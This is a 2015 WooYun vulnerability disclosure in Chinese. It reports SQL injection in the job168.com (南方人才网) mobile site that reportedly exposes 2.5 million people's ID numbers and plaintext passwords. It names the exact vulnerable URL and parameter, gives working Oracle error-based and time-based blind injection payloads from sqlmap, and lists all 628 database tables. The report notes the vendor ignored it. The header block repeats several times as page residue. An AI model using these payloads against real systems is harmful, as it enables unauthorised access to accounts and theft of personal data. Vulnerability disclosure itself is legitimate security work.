南方人才网某站存在SQL注入泄露250万个人信息（可登陆账号，查看和修改简历，泄露身份证等敏感信息）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141402

漏洞标题：南方人才网某站存在SQL注入泄露250万个人信息（可登陆账号，查看和修改简历，泄露身份证等敏感信息）

漏洞作者：路人甲

提交时间：2015-09-16 10:07

修复时间：2015-09-21 10:08

公开时间：2015-09-21 10:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-16：细节已通知厂商并且等待厂商处理中
2015-09-21：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

http://m.job168.com/schools/show.jsp?photo_no=1&school_no=5165102 南方人才网手机站点存在SQL注入

NFRC库中涉及628张表：

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: photo_no (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: photo_no=1' AND 4083=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (4083=4083) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(106)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'sVub'='sVub&school_no=5165102
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: photo_no=1' AND 8692=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(104)||CHR(101)||CHR(87),5) AND 'TYUJ'='TYUJ&school_no=5165102
---
web application technology: Nginx, JSP
back-end DBMS: Oracle
Database: NFRC
[628 tables]
+--------------------------------+
| NEW增量同步猎头简历$_TEMP                      |
| 增量同步人才人事法规$_TEMP                         |
| 增量同步招聘信息$_TEMP                         |
| 增量同步求职简历$_TEMP                         |
| 增量同步猎头简历_新$_TEMP                        |
| 番禺单位                           |
| AB                             |
| ACCESSLOG                      |
| ACCESS_STATISTIC               |
| ACTIVEEMAIL                    |
| ACTIVELOG                      |
| AD_AUTO                        |
| AD_DESIGN                      |
| AD_OPEN_LOG                    |
| AD_STAT                        |
| AD_TRACER                      |
| AGENCY_MATERIAL                |
| AGENCY_NOTICE                  |
| AGENCY_PERSON                  |
| AGENCY_PROGRESS                |
| AGENCY_SERVICE                 |
| AGENCY_TRACER                  |
| ALEXA                          |
| ALEXA_BK                       |
| ALEXA_PRIZE                    |
| ALIPAY                         |
| ALIPAY_OUTLET                  |
| ANGEL_P                        |
| ANGEL_P_BK                     |
| APPLYLOG                       |
| APPLYLOG_BK                    |
| APPLYLOG_TEMP                  |
| APP_FEEDBACK                   |
| APP_LOG                        |
| APP_RECRUIT_SHAKE              |
| APP_VERSION                    |
| ASIAN_PHOTO                    |
| ASIAN_PHOTO_VOTE               |
| ASIAN_PHOTO_VOTE_BK            |
| ASSIGN                         |
| ASSIGN2                        |
| BBS_USER                       |
| BLOG_ALBUM                     |
| BLOG_ARTICLE                   |
| BLOG_FRIEND                    |
| BLOG_INFO                      |
| BLOG_MSG                       |
| BLOG_PERSON                    |
| BLOG_PHOTO                     |
| BLOG_RANK                      |
| BLOG_REPLY                     |
| BLOG_REPORT                    |
| BLOG_TYPE                      |
| BROAD_MESSAGE                  |
| CARD                           |
| CC                             |
| CLAIM                          |
| COMMON_EXCHANGE                |
| COMMON_GOODS                   |
| COMMON_GOODS_HIPIAO            |
| COMMON_GOODS_OWNS              |
| COMMON_GOODS_OWNSLOG           |
| COMMON_PRODUCT                 |
| COMPANY                        |
| COMPANY_APPLYFUNC              |
| COMPANY_BACKUP                 |
| COMPANY_DEGREE                 |
| COMPANY_FIELD                  |
| COMPANY_INDUSTRY               |
| COMPANY_PROPERTY               |
| COMPANY_STATICS                |
| COMPANY_WORKLOC                |
| COMPANY_WORKYEARS              |
| COM_POPULOR_WORD               |
| COURSEWARE                     |
| CTIBILL                        |
| CUSTOMER_MOBILE                |
| CUSTOM_INFO                    |
| CYDS_ARTICLE                   |
| CYDS_INFO                      |
| CYDS_MEMBER                    |
| CYDS_PROJ                      |
| CYDS_PROJ_2012                 |
| CYDS_PROJ_BAK                  |
| CYDS_PROJ_BK                   |
| CYDS_SCHOOL                    |
| CYDS_SCHOOL_2012               |
| CYDS_SCORE                     |
| CYDS_SCORE_2012                |
| CYDS_USERS                     |
| CYDS_VOTE                      |
| C_AD                           |
| C_ASSIGN                       |
| C_ASSIGN2                      |
| C_ATTACHMENT                   |
| C_ATTACHMENT_HISTORY           |
| C_CONTACT                      |
| C_CUSTOM                       |
| C_ENGLISH                      |
| C_EXPORT                       |
| C_EXT_FEE                      |
| C_FAVORITE                     |
| C_FAVORITE_TYPE                |
| C_FEE_HISTORY                  |
| C_HRA_TRACER                   |
| C_ID5_FEE                      |
| C_ID5_TRACER                   |
| C_INTEGRAL                     |
| C_JYPPH                        |
| C_OP_LOG                       |
| C_PICTURE                      |
| C_REPLY                        |
| C_RESUME_LOG                   |
| C_SURVEY                       |
| C_TRACER                       |
| C_XQT                          |
| DATAYEAR                       |
| DELIVERY_COMPANY               |
| DELIVERY_RESUME                |
| DEPARTMENT                     |
| DEVELOP_ASSIGN                 |
| DEVELOP_ROBIN                  |
| DEVELOP_SHIELD                 |
| DEVELOP_TRACE                  |
| DIC_AUTH                       |
| DIC_BLOG_TMPL                  |
| DIC_COURSE                     |
| DIC_COURSE1                    |
| DIC_COURSE2                    |
| DIC_DEGREE                     |
| DIC_DEPT                       |
| DIC_EMPNUM                     |
| DIC_FIELD                      |
| DIC_FIELD2                     |
| DIC_FUNC                       |
| DIC_FUNC_CATEGORY              |
| DIC_FUNC_TYPE                  |
| DIC_FUND                       |
| DIC_H_CLIENT                   |
| DIC_H_COOPERATE                |
| DIC_H_INDUSTRY                 |
| DIC_H_PACT_TMPL                |
| DIC_H_PROPERTY                 |
| DIC_H_REGION                   |
| DIC_INDUSTRY                   |
| DIC_LANGUAGE                   |
| DIC_LEVEL                      |
| DIC_LEVEL2                     |
| DIC_MEMBER_TYPE                |
| DIC_OPERATOR                   |
| DIC_PROPERTY                   |
| DIC_REGION                     |
| DIC_REGION_STREET              |
| DIC_SALARY                     |
| DIC_SALARY2                    |
| DIC_SCHOOL_KIND                |
| DIC_SCHOOL_PROPERTY            |
| DIC_SVC                        |
| DIC_TAG                        |
| DIC_TALENT_TYPE                |
| DIC_TITLE                      |
| DRAW                           |
| DXC_SOLD                       |
| DXC_VIP                        |
| EDM_TMP                        |
| EMAIL_BLACKLIST                |
| EMAIL_LOG                      |
| EMAIL_RECORD                   |
| EMAIL_SETTING                  |
| EMAIL_TEMPLATE                 |
| ENROLL                         |
| ENTERGZ                        |
| ENTRY                          |
| ENTRY_EDUC                     |
| ENTRY_OTHER                    |
| ENTRY_POS                      |
| ENTRY_SCORE                    |
| EVAL_MODEL                     |
| EXAM_ACTIVE                    |
| EXAM_COURSE                    |
| EXAM_COU_TUTO                  |
| EXAM_FEE                       |
| EXAM_REGIST                    |
| EXAM_RESEARCH                  |
| EXAM_SCHEDULE                  |
| EXAM_SEND_SMS                  |
| EXAM_SIGNIN                    |
| EXAM_SMSREQ                    |
| EXAM_STUDENT                   |
| EXAM_TEACHER                   |
| EXAM_TRACE                     |
| EXAM_TRAIN_BOOKING             |
| EXAM_TUTORIAL                  |
| EXAM_TUTO_TAKE                 |
| EXCEL_COMPANY                  |
| FAIR_APPLY_LOG                 |
| FAIR_APPLY_STALL               |
| FAIR_FEEDBACK                  |
| FAIR_LOC                       |
| FAIR_RECRUIT                   |
| FEEDBACK                       |
| FEEDBACK2                      |
| FEEDBACK3                      |
| FIFA_FANS                      |
| FIFA_POST                      |
| FIFA_TEAM                      |
| FROM2FUTURE                    |
| GLOBAL_USER                    |
| GOLDTURNTABLE_LOG              |
| GOLDTURNTABLE_PRIZE            |
| GOLDTURNTABLE_TICKET           |
| GZSA                           |
| GZ_GRADUATE                    |
| HRA_COMPETENCY                 |
| HRA_LAW                        |
| HRA_SUBJECT                    |
| HRA_S_BASE_DATA_2010           |
| HRA_S_BASE_DATA_2012           |
| HRA_S_CITY                     |
| HRA_S_CITY_07                  |
| HRA_S_DEGREE_FACTOR_2010       |
| HRA_S_DEGREE_FACTOR_2012       |
| HRA_S_DETAIL_FACTOR_2010       |
| HRA_S_DETAIL_FACTOR_2012       |
| HRA_S_EMPLOYEE_NUM_FACTOR_2010 |
| HRA_S_EMPLOYEE_NUM_FACTOR_2012 |
| HRA_S_INDUSTRY                 |
| HRA_S_INDUSTRY_07              |
| HRA_S_INDUSTRY_FACTOR_2010     |
| HRA_S_INDUSTRY_FACTOR_2012     |
| HRA_S_LOCATION_2010            |
| HRA_S_LOCATION_2012            |
| HRA_S_LOC_FACTOR_2010          |
| HRA_S_LOC_FACTOR_2012          |
| HRA_S_PERCENT_FACTOR_2010      |
| HRA_S_PERCENT_FACTOR_2012      |
| HRA_S_POSITION                 |
| HRA_S_POSITION_07              |
| HRA_S_POSITION_2010            |
| HRA_S_POSITION_2012            |
| HRA_S_POSITION_STAT            |
| HRA_S_POSITION_STAT_07         |
| HRA_S_PROPERTY_FACTOR_2010     |
| HRA_S_PROPERTY_FACTOR_2012     |
| HRA_S_SAMPLE_ANALYSIS_2010     |
| HRA_S_SAMPLE_ANALYSIS_2012     |
| HRA_S_SAMPLE_STAT              |
| HRA_S_SAMPLE_STAT_07           |
| HRA_S_WORKYEAR_FACTOR_2010     |
| HRA_S_WORKYEAR_FACTOR_2012     |
| HRA_TEMPLATE                   |
| HRA_TEMP_TYPE                  |
| HRS_PERSON                     |
| HRS_P_EDUC                     |
| HRS_P_EXP                      |
| HRS_P_VOL                      |
| HR_NOTE                        |
| HUNTER                         |
| HUNTER_COMPANY                 |
| HUNTER_C_ENGLISH               |
| HUNTER_PERSON                  |
| HUNTER_RECRUIT                 |
| H_APPLYLOG                     |
| H_APPRAISE                     |
| H_ATTACHMENT                   |
| H_ATTACHMENT_P                 |
| H_CANDIDATE                    |
| H_CANDIDATE_BAK                |
| H_CANDIDATE_BK                 |
| H_CHANGE                       |
| H_COMMEND                      |
| H_COMPANY                      |
| H_COMPANY_BK                   |
| H_C_EDUC                       |
| H_C_EDUC_BK                    |
| H_C_EXP                        |
| H_C_EXP_BK                     |
| H_C_TAG                        |
| H_DEL_LOG                      |
| H_DESCRIPT                     |
| H_EMAIL                        |
| H_FEEDBACK                     |
| H_FEEDBACK2                    |
| H_FEEDBACK2_BK                 |
| H_FEEDBACK_OL                  |
| H_INV                          |
| H_MESSAGE                      |
| H_PACT                         |
| H_PACT2                        |
| H_PAYLOG                       |
| H_PHOTO                        |
| H_RECOMMEND                    |
| H_RECRUIT                      |
| H_RECRUITLOG                   |
| H_R_EDUC                       |
| H_R_EXP                        |
| H_SEARCH                       |
| H_SERVICE                      |
| H_SERVICE_BK                   |
| H_TEXT                         |
| H_TRACE                        |
| H_TRACE2                       |
| H_TRACE2_BK                    |
| H_TRACE_BK                     |
| H_VISIT_LOG                    |
| ID5ADJ                         |
| IDCARD_TEMP                    |
| IND_POPULOR_WORD               |
| INFO                           |
| INFO_ATTACHMENT                |
| INFO_POSITION                  |
| INFO_PY                        |
| INFO_REPLY                     |
| INTOGZ_APPLYLOG                |
| INTOGZ_COMPANY                 |
| INTOGZ_RECRUIT                 |
| INTOGZ_REQUIREMENT             |
| INVEST                         |
| JOB168BABY                     |
| JOB168BABY_GUESS               |
| JOB168BABY_VOTE_LOG            |
| JOB168BABY_VOTE_LOG_BK         |
| JOB168E                        |
| JOB168E_REPLY                  |
| JOB168E_TMP                    |
| JOB168E_TMP2                   |
| JOB168E_TMP3                   |
| JOB_FAIR                       |
| JZ_ACCESS                      |
| JZ_FAQ                         |
| JZ_PERSON                      |
| JZ_USER                        |
| JZ_USER_ACCESS                 |
| KEDUO_USER                     |
| LINK_CLICK_LOG                 |
| LOCKEDEMAIL                    |
| LOG114                         |
| MAIL                           |
| MAILDS_LOG                     |
| MAILDS_OPEN_LOG                |
| MAIL_BL                        |
| MAIL_SUBSCRIPT                 |
| MAP2010_FIELD                  |
| MAP2010_FUNC                   |
| MAP2010_INDUSTRY               |
| MAP2010_REGION                 |
| MAP2011_FUNC                   |
| MEETING                        |
| MEETING_APPLY                  |
| MEETING_APPLY_RECRUIT          |
| MEETING_ARTICLE                |
| MEETING_BOOTH                  |
| MEETING_RELATE                 |
| MEETING_SIGNIN                 |
| MEETING_SIGNIN_LOG             |
| MEMBERFEE                      |
| MEMBERFEE2                     |
| MEMBERFEE_BK                   |
| MEMBER_FEE                     |
| MESSAGE                        |
| NETPAY_OUTLET                  |
| NEWSPAPER_BOARD                |
| NEWSPAPER_DETAIL               |
| NEWSPAPER_SECOND               |
| NFRC2GZRIS                     |
| NOAHSARK                       |
| OAUTH_CONNECT                  |
| OK309_CARD                     |
| OK309_USER                     |
| OLDPHOTO                       |
| OLDPHOTO_VOTE_LOG              |
| OP                             |
| OP200910301316                 |
| OV_TRANSACTION                 |
| O_APPLYLOG                     |
| O_COMPANY                      |
| O_RECRUIT                      |
| O_TRACE                        |
| P                              |
| PARTNER                        |
| PAYMENTLOG                     |
| PERSON                         |
| PERSON_APPLYFUNC               |
| PERSON_BACKUP                  |
| PERSON_DEGREE                  |
| PERSON_FIELD                   |
| PERSON_INDUSTRY                |
| PERSON_PROPERTY                |
| PERSON_SKILL                   |
| PERSON_STATICS                 |
| PERSON_SYNC                    |
| PERSON_TEMPLATE                |
| PERSON_WORKLOC                 |
| PERSON_WORKYEARS               |
| PHOTO                          |
| PLAN_TABLE                     |
| POCOUSER                       |
| POCOZINE                       |
| POCO_SERVICE                   |
| POCO_SERVICE_BUY               |
| POCO_TEMPLATE                  |
| POCO_TEMPLATE_BUY              |
| PP                             |
| PREPARE_COMPANY                |
| PRESSIE_APPLY                  |
| PRESSIE_APPLY_DETAIL           |
| PRESSIE_APPLY_INTEGRAL         |
| PRICE_C_AD                     |
| PRICE_C_CUSTOM                 |
| PRICE_C_NP                     |
| PRICE_C_STD                    |
| PRICE_C_VER                    |
| PRODUCT                        |
| PRODUCT_PACKAGE                |
| PRODUCT_PRICE                  |
| PT_APP_REGIST                  |
| PT_APP_VIEW                    |
| PT_BASE                        |
| PT_CERT                        |
| PT_C_COMPLAINT                 |
| PT_C_REVIEW                    |
| PT_C_SCORE                     |
| PT_EDUC                        |
| PT_EXP                         |
| PT_PROJ                        |
| PT_P_COMPLAINT                 |
| PT_P_REVIEW                    |
| PT_P_SCORE                     |
| PYZP_SIGNUP                    |
| P_ADDRESS                      |
| P_ARMY                         |
| P_ARTICLE                      |
| P_ARTICLE_BK                   |
| P_ATTACHMENT                   |
| P_AUTH                         |
| P_CARD                         |
| P_CERT                         |
| P_COLLECT                      |
| P_CUSTOM                       |
| P_DEGREE_CERT                  |
| P_EDUC                         |
| P_ENGLISH                      |
| P_ETCSVC                       |
| P_EVAL                         |
| P_EVAL_NEW                     |
| P_EXP                          |
| P_EXT_FEE                      |
| P_EXT_FEE2                     |
| P_FAVORITE                     |
| P_FAVORITE_TEMP                |
| P_FEE_HISTORY                  |
| P_ID                           |
| P_ID5                          |
| P_INVEST_LOGIN                 |
| P_IVEST                        |
| P_NOTICE                       |
| P_OP_LOG                       |
| P_ORDER                        |
| P_OTHER                        |
| P_PRIZE                        |
| P_PROJ                         |
| P_REG_SPAM                     |
| P_RESUME                       |
| P_SAMPLING                     |
| P_SCHOOL                       |
| P_SEARCH_LOG                   |
| P_SENDOUT                      |
| P_SEND_FRIEND                  |
| P_SERVICE                      |
| P_SERVICE_LOG                  |
| P_SKILL                        |
| P_SMS_SVC                      |
| P_SMS_SVC2                     |
| P_TASK                         |
| P_TASK_LOG                     |
| P_TEMPLATE                     |
| P_TEXT                         |
| P_TRACER                       |
| P_VISIT_LOG                    |
| P_VOL                          |
| P_XQT                          |
| QA                             |
| QUARTER_SUM                    |
| QUERYPASS2LOG                  |
| Q_BODY                         |
| Q_DIM                          |
| Q_ELEMENT                      |
| Q_EXPR                         |
| Q_MAP                          |
| Q_MODULE                       |
| Q_PAPER                        |
| Q_REMARK                       |
| Q_TOPIC                        |
| Q_VALUE                        |
| RCJ_ASSIGN                     |
| RCJ_SCORE                      |
| RCJ_USERS                      |
| RECRUIT                        |
| RECRUITLOG                     |
| RECRUIT_APPLY_RELATED          |
| RECRUIT_BK                     |
| RECRUIT_CATALOG                |
| RECRUIT_PYZP                   |
| RECRUIT_RECYCLED               |
| RECRUIT_S                      |
| RECRUIT_TMP                    |
| REFERRER_TEMP                  |
| RESUME                         |
| RESUMEOUT_LOG                  |
| ROBIN_EXCEL_COMPANY            |
| RR                             |
| SALARY_CITYCOEFFICIENT         |
| SALARY_CITYCOEFFICIENT_07      |
| SALARY_DESCRIPTION             |
| SALARY_DESCRIPTION_07          |
| SALARY_INDUSTRYCOEFFICIENT     |
| SALARY_INDUSTRYCOEFFICIENT_07  |
| SALARY_POSITION                |
| SALARY_POSITION_07             |
| SALARY_SAMPLEANALYSIS          |
| SALARY_SAMPLEANALYSIS_07       |
| SALARY_STAT                    |
| SALESMAN                       |
| SCHOOL                         |
| SCHOOL_FIELD                   |
| SCHOOL_INFO                    |
| SCHOOL_MEMBER_FEE              |
| SCHOOL_PAYMENTLOG              |
| SCHOOL_PERSON                  |
| SCHOOL_PHOTO                   |
| SCHOOL_RECRUITLOG              |
| SCHOOL_REQ                     |
| SCHOOL_STUDINFO                |
| SHOP_APPLY                     |
| SHOP_ARTICLE                   |
| SHOP_ARTICLE_STORE             |
| SHOP_BUSINESS                  |
| SHOP_BUSINESS_LIMITS           |
| SHOP_COUPON                    |
| SHOP_CUSTOMER                  |
| SHOP_DELIVERY                  |
| SHOP_GOODS                     |
| SHOP_GOODS_BELONG              |
| SHOP_GOODS_BRAND               |
| SHOP_GOODS_PIC                 |
| SHOP_GOODS_REPLY               |
| SHOP_GOODS_TYPE                |
| SHOP_HRCOST                    |
| SHOP_MEMBER_LEVEL              |
| SHOP_ORDER                     |
| SHOP_ORDER_DETAIL              |
| SHOP_PAY                       |
| SHOP_POSTAGE                   |
| SHOP_REPORT                    |
| SHOP_SALESCOST                 |
| SHOP_STOCK                     |
| SHOP_STOCK_ORDER               |
| SHOP_STOCK_ORDER_DETAIL        |
| SHOP_STRATEGY                  |
| SHOWCASE                       |
| SHOWCASE_AD                    |
| SIGNUP                         |
| SMS                            |
| SMS_ANTI_RESEND                |
| SMS_CUSTOM                     |
| SMS_CUSTOM_LIST                |
| SMS_MESSAGE                    |
| SMS_MO                         |
| SMS_NO_ID                      |
| SMS_NUMBER                     |
| SMS_NUMBER2                    |
| SMS_REQUIREMENT                |
| SMS_TEMP                       |
| SMS_TRACER                     |
| SMS_WHITELIST                  |
| SMS_WHITELIST_APPLY            |
| SOFT_COMPANY                   |
| STATISTIC_CUSTOM               |
| STUDENT_ASSIGN                 |
| SUB_COMPANY                    |
| SURVEY                         |
| SURVEY2                        |
| SURVEY2_REPT                   |
| SURVEY_REPT                    |
| S_CUSTOM                       |
| S_FAVORITE                     |
| S_RECRUITMENT                  |
| S_SIGNUP                       |
| TAG_MAP                        |
| TALENT_KEYWORD_LOG             |
| TASK_LOG                       |
| TBBBS                          |
| TBBBSORTS                      |
| TEMP_COMPANY                   |
| TEMP_CTI                       |
| TEMP_FAIL                      |
| TEMP_PERSON                    |
| TEMP_RECRUIT                   |
| TEMP_USER                      |
| TENPAY                         |
| TMP_ASSIGN                     |
| TMP_EMAIL_LOG                  |
| TRACE_LOG                      |
| TRAINING                       |
| TRAIN_APPLY                    |
| TRAIN_APPLY2                   |
| TRAIN_CONSUME_LOG              |
| TRAIN_COURSE                   |
| TRAIN_ORGAN                    |
| TRAIN_ORGAN_FEE                |
| TRAIN_ORGAN_FEE_BK             |
| TRAIN_PAYMENTLOG               |
| TRAIN_TRAINER                  |
| TRANSFER                       |
| TRANSFER2                      |
| TUTORIAL_STORE                 |
| T_CHG_ORDER                    |
| UNIONPAY                       |
| UNIT_KEYWORD_LOG               |
| X_COMPANY                      |
| X_COMPANY_FEE                  |
| X_PERSON                       |
| X_PERSON_FEE                   |
| X_TRACE                        |
| ZSQZTLOG                       |
| ZSQZTVALID                     |
| ZYGH_COLLEGE                   |
| ZYGH_CPBG                      |
+--------------------------------+

涉及250万个人信息，包括身份证号，网站用户名和明文密码等~

可登陆账号，查看和修改简历：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-09-21 10:08

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141402

漏洞标题：南方人才网某站存在SQL注入泄露250万个人信息（可登陆账号，查看和修改简历，泄露身份证等敏感信息）

相关厂商：job168.com

漏洞作者：路人甲

提交时间：2015-09-16 10:07

修复时间：2015-09-21 10:08

公开时间：2015-09-21 10:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141402

漏洞标题：南方人才网某站存在SQL注入泄露250万个人信息（可登陆账号，查看和修改简历，泄露身份证等敏感信息）

相关厂商：job168.com

漏洞作者： 路人甲

提交时间：2015-09-16 10:07

修复时间：2015-09-21 10:08

公开时间：2015-09-21 10:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0141402"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云